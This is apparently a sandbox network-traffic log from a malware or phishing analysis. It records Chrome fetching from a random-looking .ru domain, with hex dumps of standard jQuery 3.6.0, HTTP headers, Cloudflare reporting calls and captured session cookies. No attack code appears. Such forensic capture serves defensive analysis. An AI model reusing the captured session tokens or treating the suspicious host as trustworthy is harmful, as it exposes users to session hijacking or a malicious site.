                      2025-01-14 17:00:46 UTC16384INData Raw: 22 6d 73 2d 22 29 2e 72 65 70 6c 61 63 65 28 7a 2c 55 29 7d 76 61 72 20 56 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 31 3d 3d 3d 65 2e 6e 6f 64 65 54 79 70 65 7c 7c 39 3d 3d 3d 65 2e 6e 6f 64 65 54 79 70 65 7c 7c 21 2b 65 2e 6e 6f 64 65 54 79 70 65 7d 3b 66 75 6e 63 74 69 6f 6e 20 47 28 29 7b 74 68 69 73 2e 65 78 70 61 6e 64 6f 3d 53 2e 65 78 70 61 6e 64 6f 2b 47 2e 75 69 64 2b 2b 7d 47 2e 75 69 64 3d 31 2c 47 2e 70 72 6f 74 6f 74 79 70 65 3d 7b 63 61 63 68 65 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 65 5b 74 68 69 73 2e 65 78 70 61 6e 64 6f 5d 3b 72 65 74 75 72 6e 20 74 7c 7c 28 74 3d 7b 7d 2c 56 28 65 29 26 26 28 65 2e 6e 6f 64 65 54 79 70 65 3f 65 5b 74 68 69 73 2e 65 78 70 61 6e 64 6f 5d 3d 74 3a 4f 62 6a 65 63 74 2e
                      Data Ascii: "ms-").replace(z,U)}var V=function(e){return 1===e.nodeType||9===e.nodeType||!+e.nodeType};function G(){this.expando=S.expando+G.uid++}G.uid=1,G.prototype={cache:function(e){var t=e[this.expando];return t||(t={},V(e)&&(e.nodeType?e[this.expando]=t:Object.
                      2025-01-14 17:00:46 UTC16384INData Raw: 72 5d 29 3b 65 6c 73 65 20 4c 65 28 65 2c 63 29 3b 72 65 74 75 72 6e 20 30 3c 28 61 3d 76 65 28 63 2c 22 73 63 72 69 70 74 22 29 29 2e 6c 65 6e 67 74 68 26 26 79 65 28 61 2c 21 66 26 26 76 65 28 65 2c 22 73 63 72 69 70 74 22 29 29 2c 63 7d 2c 63 6c 65 61 6e 44 61 74 61 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 66 6f 72 28 76 61 72 20 74 2c 6e 2c 72 2c 69 3d 53 2e 65 76 65 6e 74 2e 73 70 65 63 69 61 6c 2c 6f 3d 30 3b 76 6f 69 64 20 30 21 3d 3d 28 6e 3d 65 5b 6f 5d 29 3b 6f 2b 2b 29 69 66 28 56 28 6e 29 29 7b 69 66 28 74 3d 6e 5b 59 2e 65 78 70 61 6e 64 6f 5d 29 7b 69 66 28 74 2e 65 76 65 6e 74 73 29 66 6f 72 28 72 20 69 6e 20 74 2e 65 76 65 6e 74 73 29 69 5b 72 5d 3f 53 2e 65 76 65 6e 74 2e 72 65 6d 6f 76 65 28 6e 2c 72 29 3a 53 2e 72 65 6d 6f 76 65 45 76 65
                      Data Ascii: r]);else Le(e,c);return 0<(a=ve(c,"script")).length&&ye(a,!f&&ve(e,"script")),c},cleanData:function(e){for(var t,n,r,i=S.event.special,o=0;void 0!==(n=e[o]);o++)if(V(n)){if(t=n[Y.expando]){if(t.events)for(r in t.events)i[r]?S.event.remove(n,r):S.removeEve
                      2025-01-14 17:00:46 UTC16384INData Raw: 53 2e 65 78 74 65 6e 64 28 7b 61 74 74 72 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 76 61 72 20 72 2c 69 2c 6f 3d 65 2e 6e 6f 64 65 54 79 70 65 3b 69 66 28 33 21 3d 3d 6f 26 26 38 21 3d 3d 6f 26 26 32 21 3d 3d 6f 29 72 65 74 75 72 6e 22 75 6e 64 65 66 69 6e 65 64 22 3d 3d 74 79 70 65 6f 66 20 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 3f 53 2e 70 72 6f 70 28 65 2c 74 2c 6e 29 3a 28 31 3d 3d 3d 6f 26 26 53 2e 69 73 58 4d 4c 44 6f 63 28 65 29 7c 7c 28 69 3d 53 2e 61 74 74 72 48 6f 6f 6b 73 5b 74 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 5d 7c 7c 28 53 2e 65 78 70 72 2e 6d 61 74 63 68 2e 62 6f 6f 6c 2e 74 65 73 74 28 74 29 3f 63 74 3a 76 6f 69 64 20 30 29 29 2c 76 6f 69 64 20 30 21 3d 3d 6e 3f 6e 75 6c 6c 3d 3d 3d 6e 3f 76 6f 69 64 20 53 2e 72 65 6d
                      Data Ascii: S.extend({attr:function(e,t,n){var r,i,o=e.nodeType;if(3!==o&&8!==o&&2!==o)return"undefined"==typeof e.getAttribute?S.prop(e,t,n):(1===o&&S.isXMLDoc(e)||(i=S.attrHooks[t.toLowerCase()]||(S.expr.match.bool.test(t)?ct:void 0)),void 0!==n?null===n?void S.rem
                      2025-01-14 17:00:46 UTC7581INData Raw: 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 2c 72 3d 69 2e 78 68 72 28 29 3b 69 66 28 72 2e 6f 70 65 6e 28 69 2e 74 79 70 65 2c 69 2e 75 72 6c 2c 69 2e 61 73 79 6e 63 2c 69 2e 75 73 65 72 6e 61 6d 65 2c 69 2e 70 61 73 73 77 6f 72 64 29 2c 69 2e 78 68 72 46 69 65 6c 64 73 29 66 6f 72 28 6e 20 69 6e 20 69 2e 78 68 72 46 69 65 6c 64 73 29 72 5b 6e 5d 3d 69 2e 78 68 72 46 69 65 6c 64 73 5b 6e 5d 3b 66 6f 72 28 6e 20 69 6e 20 69 2e 6d 69 6d 65 54 79 70 65 26 26 72 2e 6f 76 65 72 72 69 64 65 4d 69 6d 65 54 79 70 65 26 26 72 2e 6f 76 65 72 72 69 64 65 4d 69 6d 65 54 79 70 65 28 69 2e 6d 69 6d 65 54 79 70 65 29 2c 69 2e 63 72 6f 73 73 44 6f 6d 61 69 6e 7c 7c 65 5b 22 58 2d 52 65 71 75 65 73 74 65 64 2d 57 69 74 68 22 5d 7c 7c 28 65 5b 22 58 2d 52
                      Data Ascii: :function(e,t){var n,r=i.xhr();if(r.open(i.type,i.url,i.async,i.username,i.password),i.xhrFields)for(n in i.xhrFields)r[n]=i.xhrFields[n];for(n in i.mimeType&&r.overrideMimeType&&r.overrideMimeType(i.mimeType),i.crossDomain||e["X-Requested-With"]||(e["X-R


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      2192.168.2.549717104.21.64.14435896C:\Program Files\Google\Chrome\Application\chrome.exe
                      TimestampBytes transferredDirectionData
                      2025-01-14 17:00:46 UTC1321OUTGET /favicon.ico HTTP/1.1
                      Host: xucr.vafdcekgwp.ru
                      Connection: keep-alive
                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                      sec-ch-ua-mobile: ?0
                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                      sec-ch-ua-platform: "Windows"
                      Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                      Sec-Fetch-Site: same-origin
                      Sec-Fetch-Mode: no-cors
                      Sec-Fetch-Dest: image
                      Referer: https://xucr.vafdcekgwp.ru/aIDt6/
                      Accept-Encoding: gzip, deflate, br
                      Accept-Language: en-US,en;q=0.9
                      Cookie: XSRF-TOKEN=eyJpdiI6IkY0eGxOVVRGdVJUTEZRMnVnQmdLblE9PSIsInZhbHVlIjoicVJXbFcwc0N0QnlzM25ET3J4ZmhvWXExSHdQK2h4ZCt2Z0ttQlBraVMxblNTdHRuS0JUVDczSEVHb2pzS2dZaFFnTVBWc09WRmVlbXhObkpuUWpZNEYwZEVrZ3ErTndaSmpEb1E2eGFmL1lQNVZWRUpLR3VLeEh3cFI2SU94MkYiLCJtYWMiOiJjMTFhMTE1YjlhMDQ0NmNkMzMxMTk5NzI0YzRlNmYxNDI5MTVkYTk4ODY0ZWZjNmYyNGZmZjBhZTRlZjZmMGRjIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6InJObkQ4YlBSQXdnKzY5S3JPZ2xSS2c9PSIsInZhbHVlIjoiOUlpMnBDL21PSnVVSVhYakQxSWF1dVFOYVV4eW9ZZGlSQkJJK3ZKemxlQTRjTVNIa014cnNvMDJPZ3BDR0tYSm5NWGs4R09NVi8wODFJd1pKT0hwejNUMnQ2U3dmZkJkbThnWUk2VWtxdkZzN3BwN1FUenZjSzBPREczL0haOE4iLCJtYWMiOiIxZGEwM2I5ZDA0NzkxMWM2ODU1YzhjNjY2OWI5YWNhZjJmY2ZiZDVkMjRlZGExMzI5YWJlZWZhOWVkNDIwNDk3IiwidGFnIjoiIn0%3D
                      2025-01-14 17:00:46 UTC1078INHTTP/1.1 404 Not Found
                      Date: Tue, 14 Jan 2025 17:00:46 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: close
                      Cache-Control: max-age=14400
                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=fcnvMAToCQrOmRQyOYbXmsU2EAzbdRYbCzZrvmJ1iTZa7mnMVFCbodu0qwW3LHRV1ihUIPf5Ux9KGPhhnopJ0Tmu5bivj51%2B5Rxh%2BhrZsotBNRPmV%2BeaRovDIy0y5A%3D%3D"}],"group":"cf-nel","max_age":604800}
                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                      Vary: Accept-Encoding
                      alt-svc: h3=":443"; ma=86400
                      server-timing: cfL4;desc="?proto=TCP&rtt=7959&min_rtt=5452&rtt_var=2954&sent=170&recv=119&lost=0&retrans=0&sent_bytes=179414&recv_bytes=17507&delivery_rate=1536138&cwnd=257&unsent_bytes=0&cid=38bdddedf3e3bcd0&ts=82512&x=0"
                      CF-Cache-Status: HIT
                      Age: 9318
                      Server: cloudflare
                      CF-RAY: 901f2f28ea2ade95-EWR
                      server-timing: cfL4;desc="?proto=TCP&rtt=1588&min_rtt=1534&rtt_var=614&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2833&recv_bytes=1899&delivery_rate=1903520&cwnd=245&unsent_bytes=0&cid=e259585100caa887&ts=2055&x=0"
                      2025-01-14 17:00:46 UTC5INData Raw: 30 0d 0a 0d 0a
                      Data Ascii: 0


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      3192.168.2.549719151.101.130.1374435896C:\Program Files\Google\Chrome\Application\chrome.exe
                      TimestampBytes transferredDirectionData
                      2025-01-14 17:00:47 UTC358OUTGET /jquery-3.6.0.min.js HTTP/1.1
                      Host: code.jquery.com
                      Connection: keep-alive
                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                      Accept: */*
                      Sec-Fetch-Site: none
                      Sec-Fetch-Mode: cors
                      Sec-Fetch-Dest: empty
                      Accept-Encoding: gzip, deflate, br
                      Accept-Language: en-US,en;q=0.9
                      2025-01-14 17:00:47 UTC613INHTTP/1.1 200 OK
                      Connection: close
                      Content-Length: 89501
                      Server: nginx
                      Content-Type: application/javascript; charset=utf-8
                      Last-Modified: Fri, 18 Oct 1991 12:00:00 GMT
                      ETag: "28feccc0-15d9d"
                      Cache-Control: public, max-age=31536000, stale-while-revalidate=604800
                      Access-Control-Allow-Origin: *
                      Cross-Origin-Resource-Policy: cross-origin
                      Via: 1.1 varnish, 1.1 varnish
                      Accept-Ranges: bytes
                      Date: Tue, 14 Jan 2025 17:00:47 GMT
                      Age: 2358573
                      X-Served-By: cache-lga21931-LGA, cache-ewr-kewr1740044-EWR
                      X-Cache: HIT, HIT
                      X-Cache-Hits: 2774, 4
                      X-Timer: S1736874047.259859,VS0,VE0
                      Vary: Accept-Encoding
                      2025-01-14 17:00:47 UTC1378INData Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 36 2e 30 20 7c 20 28 63 29 20 4f 70 65 6e 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 2e 64 6f 63 75 6d 65 6e 74 3f 74 28 65 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 21 65 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 6a 51 75
                      Data Ascii: /*! jQuery v3.6.0 | (c) OpenJS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQu
                      2025-01-14 17:00:47 UTC1378INData Raw: 7d 2c 67 65 74 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 6e 75 6c 6c 3d 3d 65 3f 73 2e 63 61 6c 6c 28 74 68 69 73 29 3a 65 3c 30 3f 74 68 69 73 5b 65 2b 74 68 69 73 2e 6c 65 6e 67 74 68 5d 3a 74 68 69 73 5b 65 5d 7d 2c 70 75 73 68 53 74 61 63 6b 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 53 2e 6d 65 72 67 65 28 74 68 69 73 2e 63 6f 6e 73 74 72 75 63 74 6f 72 28 29 2c 65 29 3b 72 65 74 75 72 6e 20 74 2e 70 72 65 76 4f 62 6a 65 63 74 3d 74 68 69 73 2c 74 7d 2c 65 61 63 68 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 53 2e 65 61 63 68 28 74 68 69 73 2c 65 29 7d 2c 6d 61 70 3a 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 70 75 73 68 53 74 61 63 6b 28 53 2e 6d 61 70 28 74 68 69 73 2c 66
                      Data Ascii: },get:function(e){return null==e?s.call(this):e<0?this[e+this.length]:this[e]},pushStack:function(e){var t=S.merge(this.constructor(),e);return t.prevObject=this,t},each:function(e){return S.each(this,e)},map:function(n){return this.pushStack(S.map(this,f
                      2025-01-14 17:00:47 UTC1378INData Raw: 6f 6e 28 65 29 7b 76 61 72 20 74 2c 6e 3b 72 65 74 75 72 6e 21 28 21 65 7c 7c 22 5b 6f 62 6a 65 63 74 20 4f 62 6a 65 63 74 5d 22 21 3d 3d 6f 2e 63 61 6c 6c 28 65 29 29 26 26 28 21 28 74 3d 72 28 65 29 29 7c 7c 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 28 6e 3d 76 2e 63 61 6c 6c 28 74 2c 22 63 6f 6e 73 74 72 75 63 74 6f 72 22 29 26 26 74 2e 63 6f 6e 73 74 72 75 63 74 6f 72 29 26 26 61 2e 63 61 6c 6c 28 6e 29 3d 3d 3d 6c 29 7d 2c 69 73 45 6d 70 74 79 4f 62 6a 65 63 74 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3b 66 6f 72 28 74 20 69 6e 20 65 29 72 65 74 75 72 6e 21 31 3b 72 65 74 75 72 6e 21 30 7d 2c 67 6c 6f 62 61 6c 45 76 61 6c 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 62 28 65 2c 7b 6e 6f 6e 63 65 3a 74 26 26 74 2e 6e 6f
                      Data Ascii: on(e){var t,n;return!(!e||"[object Object]"!==o.call(e))&&(!(t=r(e))||"function"==typeof(n=v.call(t,"constructor")&&t.constructor)&&a.call(n)===l)},isEmptyObject:function(e){var t;for(t in e)return!1;return!0},globalEval:function(e,t,n){b(e,{nonce:t&&t.no
                      2025-01-14 17:00:47 UTC1378INData Raw: 5d 2c 71 3d 74 2e 70 6f 70 2c 4c 3d 74 2e 70 75 73 68 2c 48 3d 74 2e 70 75 73 68 2c 4f 3d 74 2e 73 6c 69 63 65 2c 50 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 66 6f 72 28 76 61 72 20 6e 3d 30 2c 72 3d 65 2e 6c 65 6e 67 74 68 3b 6e 3c 72 3b 6e 2b 2b 29 69 66 28 65 5b 6e 5d 3d 3d 3d 74 29 72 65 74 75 72 6e 20 6e 3b 72 65 74 75 72 6e 2d 31 7d 2c 52 3d 22 63 68 65 63 6b 65 64 7c 73 65 6c 65 63 74 65 64 7c 61 73 79 6e 63 7c 61 75 74 6f 66 6f 63 75 73 7c 61 75 74 6f 70 6c 61 79 7c 63 6f 6e 74 72 6f 6c 73 7c 64 65 66 65 72 7c 64 69 73 61 62 6c 65 64 7c 68 69 64 64 65 6e 7c 69 73 6d 61 70 7c 6c 6f 6f 70 7c 6d 75 6c 74 69 70 6c 65 7c 6f 70 65 6e 7c 72 65 61 64 6f 6e 6c 79 7c 72 65 71 75 69 72 65 64 7c 73 63 6f 70 65 64 22 2c 4d 3d 22 5b 5c 5c 78 32 30 5c 5c 74
                      Data Ascii: ],q=t.pop,L=t.push,H=t.push,O=t.slice,P=function(e,t){for(var n=0,r=e.length;n<r;n++)if(e[n]===t)return n;return-1},R="checked|selected|async|autofocus|autoplay|controls|defer|disabled|hidden|ismap|loop|multiple|open|readonly|required|scoped",M="[\\x20\\t
                      2025-01-14 17:00:47 UTC1378INData Raw: 2c 65 65 3d 2f 5b 2b 7e 5d 2f 2c 74 65 3d 6e 65 77 20 52 65 67 45 78 70 28 22 5c 5c 5c 5c 5b 5c 5c 64 61 2d 66 41 2d 46 5d 7b 31 2c 36 7d 22 2b 4d 2b 22 3f 7c 5c 5c 5c 5c 28 5b 5e 5c 5c 72 5c 5c 6e 5c 5c 66 5d 29 22 2c 22 67 22 29 2c 6e 65 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 3d 22 30 78 22 2b 65 2e 73 6c 69 63 65 28 31 29 2d 36 35 35 33 36 3b 72 65 74 75 72 6e 20 74 7c 7c 28 6e 3c 30 3f 53 74 72 69 6e 67 2e 66 72 6f 6d 43 68 61 72 43 6f 64 65 28 6e 2b 36 35 35 33 36 29 3a 53 74 72 69 6e 67 2e 66 72 6f 6d 43 68 61 72 43 6f 64 65 28 6e 3e 3e 31 30 7c 35 35 32 39 36 2c 31 30 32 33 26 6e 7c 35 36 33 32 30 29 29 7d 2c 72 65 3d 2f 28 5b 5c 30 2d 5c 78 31 66 5c 78 37 66 5d 7c 5e 2d 3f 5c 64 29 7c 5e 2d 24 7c 5b 5e 5c 30 2d 5c 78 31 66 5c
                      Data Ascii: ,ee=/[+~]/,te=new RegExp("\\\\[\\da-fA-F]{1,6}"+M+"?|\\\\([^\\r\\n\\f])","g"),ne=function(e,t){var n="0x"+e.slice(1)-65536;return t||(n<0?String.fromCharCode(n+65536):String.fromCharCode(n>>10|55296,1023&n|56320))},re=/([\0-\x1f\x7f]|^-?\d)|^-$|[^\0-\x1f\
                      2025-01-14 17:00:47 UTC1378INData Raw: 29 29 7b 28 66 3d 65 65 2e 74 65 73 74 28 74 29 26 26 79 65 28 65 2e 70 61 72 65 6e 74 4e 6f 64 65 29 7c 7c 65 29 3d 3d 3d 65 26 26 64 2e 73 63 6f 70 65 7c 7c 28 28 73 3d 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 22 69 64 22 29 29 3f 73 3d 73 2e 72 65 70 6c 61 63 65 28 72 65 2c 69 65 29 3a 65 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 69 64 22 2c 73 3d 53 29 29 2c 6f 3d 28 6c 3d 68 28 74 29 29 2e 6c 65 6e 67 74 68 3b 77 68 69 6c 65 28 6f 2d 2d 29 6c 5b 6f 5d 3d 28 73 3f 22 23 22 2b 73 3a 22 3a 73 63 6f 70 65 22 29 2b 22 20 22 2b 78 65 28 6c 5b 6f 5d 29 3b 63 3d 6c 2e 6a 6f 69 6e 28 22 2c 22 29 7d 74 72 79 7b 72 65 74 75 72 6e 20 48 2e 61 70 70 6c 79 28 6e 2c 66 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 63 29 29 2c 6e 7d 63 61 74 63 68 28
                      Data Ascii: )){(f=ee.test(t)&&ye(e.parentNode)||e)===e&&d.scope||((s=e.getAttribute("id"))?s=s.replace(re,ie):e.setAttribute("id",s=S)),o=(l=h(t)).length;while(o--)l[o]=(s?"#"+s:":scope")+" "+xe(l[o]);c=l.join(",")}try{return H.apply(n,f.querySelectorAll(c)),n}catch(
                      2025-01-14 17:00:47 UTC1378INData Raw: 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 2c 72 3d 61 28 5b 5d 2c 65 2e 6c 65 6e 67 74 68 2c 6f 29 2c 69 3d 72 2e 6c 65 6e 67 74 68 3b 77 68 69 6c 65 28 69 2d 2d 29 65 5b 6e 3d 72 5b 69 5d 5d 26 26 28 65 5b 6e 5d 3d 21 28 74 5b 6e 5d 3d 65 5b 6e 5d 29 29 7d 29 7d 29 7d 66 75 6e 63 74 69 6f 6e 20 79 65 28 65 29 7b 72 65 74 75 72 6e 20 65 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 65 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 26 26 65 7d 66 6f 72 28 65 20 69 6e 20 64 3d 73 65 2e 73 75 70 70 6f 72 74 3d 7b 7d 2c 69 3d 73 65 2e 69 73 58 4d 4c 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 65 26 26 65 2e 6e 61 6d 65 73 70 61 63 65 55 52 49 2c 6e 3d 65 26 26 28 65 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 7c
                      Data Ascii: ion(e,t){var n,r=a([],e.length,o),i=r.length;while(i--)e[n=r[i]]&&(e[n]=!(t[n]=e[n]))})})}function ye(e){return e&&"undefined"!=typeof e.getElementsByTagName&&e}for(e in d=se.support={},i=se.isXML=function(e){var t=e&&e.namespaceURI,n=e&&(e.ownerDocument|
                      2025-01-14 17:00:47 UTC1378INData Raw: 74 69 6f 6e 28 65 29 7b 76 61 72 20 6e 3d 65 2e 72 65 70 6c 61 63 65 28 74 65 2c 6e 65 29 3b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 4e 6f 64 65 26 26 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 4e 6f 64 65 28 22 69 64 22 29 3b 72 65 74 75 72 6e 20 74 26 26 74 2e 76 61 6c 75 65 3d 3d 3d 6e 7d 7d 2c 62 2e 66 69 6e 64 2e 49 44 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 69 66 28 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 26 26 45 29 7b 76 61 72 20 6e 2c 72 2c 69 2c 6f 3d 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 65 29 3b 69 66 28 6f 29 7b 69 66 28 28
                      Data Ascii: tion(e){var n=e.replace(te,ne);return function(e){var t="undefined"!=typeof e.getAttributeNode&&e.getAttributeNode("id");return t&&t.value===n}},b.find.ID=function(e,t){if("undefined"!=typeof t.getElementById&&E){var n,r,i,o=t.getElementById(e);if(o){if((
                      2025-01-14 17:00:47 UTC1378INData Raw: 5b 22 2b 4d 2b 22 2a 6e 61 6d 65 22 2b 4d 2b 22 2a 3d 22 2b 4d 2b 22 2a 28 3f 3a 27 27 7c 5c 22 5c 22 29 22 29 2c 65 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 3a 63 68 65 63 6b 65 64 22 29 2e 6c 65 6e 67 74 68 7c 7c 76 2e 70 75 73 68 28 22 3a 63 68 65 63 6b 65 64 22 29 2c 65 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 61 23 22 2b 53 2b 22 2b 2a 22 29 2e 6c 65 6e 67 74 68 7c 7c 76 2e 70 75 73 68 28 22 2e 23 2e 2b 5b 2b 7e 5d 22 29 2c 65 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 5c 5c 5c 66 22 29 2c 76 2e 70 75 73 68 28 22 5b 5c 5c 72 5c 5c 6e 5c 5c 66 5d 22 29 7d 29 2c 63 65 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 69 6e 6e 65 72 48 54 4d 4c 3d 22 3c 61 20 68 72 65 66 3d 27 27 20 64 69 73 61 62 6c 65 64 3d 27
                      Data Ascii: ["+M+"*name"+M+"*="+M+"*(?:''|\"\")"),e.querySelectorAll(":checked").length||v.push(":checked"),e.querySelectorAll("a#"+S+"+*").length||v.push(".#.+[+~]"),e.querySelectorAll("\\\f"),v.push("[\\r\\n\\f]")}),ce(function(e){e.innerHTML="<a href='' disabled='
                      2025-01-14 17:00:47 UTC1378INData Raw: 65 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 2d 21 74 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 3b 72 65 74 75 72 6e 20 6e 7c 7c 28 31 26 28 6e 3d 28 65 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 7c 7c 65 29 3d 3d 28 74 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 7c 7c 74 29 3f 65 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 28 74 29 3a 31 29 7c 7c 21 64 2e 73 6f 72 74 44 65 74 61 63 68 65 64 26 26 74 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 28 65 29 3d 3d 3d 6e 3f 65 3d 3d 43 7c 7c 65 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 3d 3d 70 26 26 79 28 70 2c 65 29 3f 2d 31 3a 74 3d 3d 43 7c 7c 74 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 3d 3d 70
                      Data Ascii: e.compareDocumentPosition-!t.compareDocumentPosition;return n||(1&(n=(e.ownerDocument||e)==(t.ownerDocument||t)?e.compareDocumentPosition(t):1)||!d.sortDetached&&t.compareDocumentPosition(e)===n?e==C||e.ownerDocument==p&&y(p,e)?-1:t==C||t.ownerDocument==p


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      4192.168.2.54972235.190.80.14435896C:\Program Files\Google\Chrome\Application\chrome.exe
                      TimestampBytes transferredDirectionData
                      2025-01-14 17:00:47 UTC537OUTOPTIONS /report/v4?s=fcnvMAToCQrOmRQyOYbXmsU2EAzbdRYbCzZrvmJ1iTZa7mnMVFCbodu0qwW3LHRV1ihUIPf5Ux9KGPhhnopJ0Tmu5bivj51%2B5Rxh%2BhrZsotBNRPmV%2BeaRovDIy0y5A%3D%3D HTTP/1.1
                      Host: a.nel.cloudflare.com
                      Connection: keep-alive
                      Origin: https://xucr.vafdcekgwp.ru
                      Access-Control-Request-Method: POST
                      Access-Control-Request-Headers: content-type
                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                      Accept-Encoding: gzip, deflate, br
                      Accept-Language: en-US,en;q=0.9
                      2025-01-14 17:00:47 UTC336INHTTP/1.1 200 OK
                      Content-Length: 0
                      access-control-max-age: 86400
                      access-control-allow-methods: OPTIONS, POST
                      access-control-allow-origin: *
                      access-control-allow-headers: content-type, content-length
                      date: Tue, 14 Jan 2025 17:00:47 GMT
                      Via: 1.1 google
                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                      Connection: close


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      5192.168.2.54972335.190.80.14435896C:\Program Files\Google\Chrome\Application\chrome.exe
                      TimestampBytes transferredDirectionData
                      2025-01-14 17:00:48 UTC476OUTPOST /report/v4?s=fcnvMAToCQrOmRQyOYbXmsU2EAzbdRYbCzZrvmJ1iTZa7mnMVFCbodu0qwW3LHRV1ihUIPf5Ux9KGPhhnopJ0Tmu5bivj51%2B5Rxh%2BhrZsotBNRPmV%2BeaRovDIy0y5A%3D%3D HTTP/1.1
                      Host: a.nel.cloudflare.com
                      Connection: keep-alive
                      Content-Length: 430
                      Content-Type: application/reports+json
                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                      Accept-Encoding: gzip, deflate, br
                      Accept-Language: en-US,en;q=0.9
